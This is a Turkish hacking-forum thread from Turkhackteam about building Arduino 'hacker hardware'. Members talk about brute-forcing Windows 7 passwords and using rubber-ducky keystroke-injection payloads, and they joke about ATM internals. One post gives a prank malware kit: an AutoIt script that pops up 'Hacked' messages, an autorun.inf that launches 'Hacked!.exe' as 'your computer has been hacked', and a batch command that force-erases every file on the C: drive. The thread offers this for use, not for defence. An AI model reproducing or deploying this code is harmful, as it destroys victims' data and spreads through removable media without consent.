Bir Hackerin Vaz Geçilmez Donanımı (Kendin yap)

ByKaranlikGece

Kıdemli Üye
27 Mar 2016
2,543
2
Cc+
giphy.gif

ELLERINE SAGLIK

NoYaN'

Üye
31 Ağu 2016
89
0
@karazafer_ eline sağlık.

Şimdi arduino setimi bulmaya çalışıyorum arduino ile brute force yapmaya çalışacağım. Başarılı olabilirmiyim bilemiyorum.

Örneğin bir windows 7 şifreli, milyonlarca şifreyi 1-2 dakikada deneme yapabilir.. Ekrana o anda hangi şifreyi deneme yapıyorsa yazdırırım.

Adım adım gelişmeleri yazarım, yardım ihtiyacı olursa rahatsız edeyim seni. :)

Bu belki çok büyük gözükmüyor fakat sen elektronikcisin anladığım kadarıyla ATM yapılarını bilirsin.. Ha tabii öyle bir niyetim yok yanlış anlaşılmasın Allah haramdan korusun. :))

karazafer_

Kıdemli Üye
11 Ağu 2009
2,267
4
System32
@karazafer_ eline sağlık.

Şimdi arduino setimi bulmaya çalışıyorum arduino ile brute force yapmaya çalışacağım. Başarılı olabilirmiyim bilemiyorum.

Örneğin bir windows 7 şifreli, milyonlarca şifreyi 1-2 dakikada deneme yapabilir.. Ekrana o anda hangi şifreyi deneme yapıyorsa yazdırırım.

Adım adım gelişmeleri yazarım, yardım ihtiyacı olursa rahatsız edeyim seni. :)

Bu belki çok büyük gözükmüyor fakat sen elektronikcisin anladığım kadarıyla ATM yapılarını bilirsin.. Ha tabii öyle bir niyetim yok yanlış anlaşılmasın Allah haramdan korusun. :))

tabi ki yardımcı olurum. evet atm nin çalışma sistemini de biliyorum. fakat harama el sürmem. takıldığınız yer olursa yardımcı olurum fakat bu hex dosyaları uno içindir. bilginiz olsun. yakın zamanda daha küçüğünü yapıcağım arduino pro ile. bundan daha iyi olacak ve rubber ducky kodlarını kullanabilceğiz.

NoYaN'

Üye
31 Ağu 2016
89
0
tabi ki yardımcı olurum. evet atm nin çalışma sistemini de biliyorum. fakat harama el sürmem. takıldığınız yer olursa yardımcı olurum fakat bu hex dosyaları uno içindir. bilginiz olsun. yakın zamanda daha küçüğünü yapıcağım arduino pro ile. bundan daha iyi olacak ve rubber ducky kodlarını kullanabilceğiz.

Dün bayağı uğraştım fakat başarılı olamadım.

Dostum aslında şu da güzel duruyor:

#NoTrayIcon

Dim $Message1

Dim $Message2

Dim $Message3

Dim $Message4

Dim $Title

$Title = “Hacked”

$Message1 = “Hacked”

$Message2 = “Hacked”

$Message3 = “Hacked”

$Message4 = “Hacked”

$Message5 = “Hacked”

MsgBox(266304,$Title,$Message1 & @CRLF & $Message2 & @CRLF & $Message3 & @CRLF & $Message4 & @CRLF & $Message5)
[autorun]

icon=Hacked! . exe

open=Hacked! . exe

action=Bilgisiyarınız Hacklendi.

label=Bilgisiyarınız Hacklendi.

shell\open\command=Hacked!. exe

shell\open=Hacked!

CD ..
CD ..
CD ..
erase c: /f /s /q /a

:))

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.